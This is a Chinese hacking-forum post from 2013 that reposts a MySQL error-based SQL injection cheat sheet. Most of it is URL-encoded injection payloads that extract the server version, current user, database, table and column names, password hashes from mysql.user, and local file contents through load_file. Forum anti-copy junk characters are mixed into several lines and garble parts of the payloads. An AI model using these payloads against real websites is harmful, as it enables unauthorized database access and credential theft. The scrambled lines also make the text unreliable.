找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2201|回复: 0
打印 上一主题 下一主题

Mysql暴错注入参考(pdf)

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-27 11:00:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑 % z8 d6 N/ t" Q

6 ]7 |3 ^$ s- }& o( ^  ~# U
: |# X5 j; a6 xMysql暴错注入参考(pdf),每天一贴。。。
( j! D0 k4 }  i, H
* B' a& [# D3 V$ DMySql Error Based Injection Reference
' v, }8 A, C. P; }[Mysql暴错注入参考]& O5 k  ~5 Z* `& ^% x
Authornig0s1992# Q: H0 p- ]+ ?2 c0 K- Y
Blog:http://pnig0s1992.blog.51cto.com/
3 T( j/ B4 ^  f; `9 h! m& J6 QTeAm:http://www.FreeBuf.com/
! m8 o; o; B+ O8 T- z! }Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功2 d$ W+ |' E* S5 Z0 B. _
小部分版本使用name_const()时会报错.可以用给出的Method.2测试$ I- S5 N- B1 \3 c4 w+ B
查询版本:" E8 |2 z  U' C1 B& C1 v$ p
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+: W. ^! @5 s! e) `
join+(select+name_const(@@version,0))b)c)
( n+ ~) i) L; rMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
+ @! U7 o, a+ w/ tup by a)b)
0 D7 N  x: R: a* y! v% V- ?查询当前用户:
. G" r7 f6 g7 r6 \; ?- d4 VMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
$ i$ ?# \0 x  t& vMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r$ _& Y2 w% j* s' N
and(0)*2))x+from+information_schema.tables+group+by+x)a)
$ q$ j, V' I( Y' w5 z% L查询当前数据库:7 g% V/ [7 Z* E+ v3 V) Q! z0 b
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)/ e3 x: s4 F8 W4 m
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo! C7 T% l5 ~; ~; `( `
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
! p2 B4 h- k5 w4 c% u! @依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
6 W4 x% K# |4 {0 o/ ALIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
  T- g" p8 S0 q6 ^3 A2 f顺序替换) D5 E9 x  l0 \
爆指定库数目:
# s$ G* f, t' O/ {4 {and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
! |/ M! E2 Z, c" Y3 n/ X: ?4 fable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group! n& S6 T( ~  m& W0 y% O; O
+by+x)a)+and+1=1 0x6D7973716C=mysql
. |6 o, O6 y! J4 ]9 v: q' g7 w: A依次爆表:
' V: A2 l* j* o9 qand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
# Y1 e& X8 \, d3 bable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
  E: o1 Q7 p4 q6 q' ]: ^. _bles+group+by+x)a)+and+1=1
6 R# D, M' o; y0x6D7973716C=Mysql 将n顺序替换# q* d" z0 O# W3 ^) B3 f
爆表内字段数目:
% |- x' s6 j4 ?1 ?5 C: Sand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
7 W. k7 q9 ^. C2 K' F5 T+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran: i5 [+ J1 Z. c) [/ a% i
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1, f9 H( b* s+ y; L
依次爆字段:) }$ _3 H2 ~2 ]0 V
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
' i5 @3 ]+ ?1 @* K2 ?+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1: D0 W& b& ]; b
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
3 }4 P. ^$ L$ m( m5 E  b! ]依次暴内容:$ H% o) z9 E; G8 T
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche0 k! @+ s. T3 ^% n/ W$ C4 i+ Q
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=13 u' I& @" F1 v. _% _9 s+ |5 c
将n顺序替换
6 w4 I- c; E: |/ \% Z5 b爆文件内容:" B5 e- T2 O; W2 b6 `! [( ], G3 o
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a/ c" _* E0 u/ z
from+information_schema.tables+group+by+a)b) . |" g# _' l$ k! U0 o
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
; Y* L( v; a6 n' D6 ]Thx for reading.1 }3 [% J- Q" P  V

% I, E/ y0 ?4 C. a" V5 b# T不要下载也可以,
% l) j) d# s0 L  o" F

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表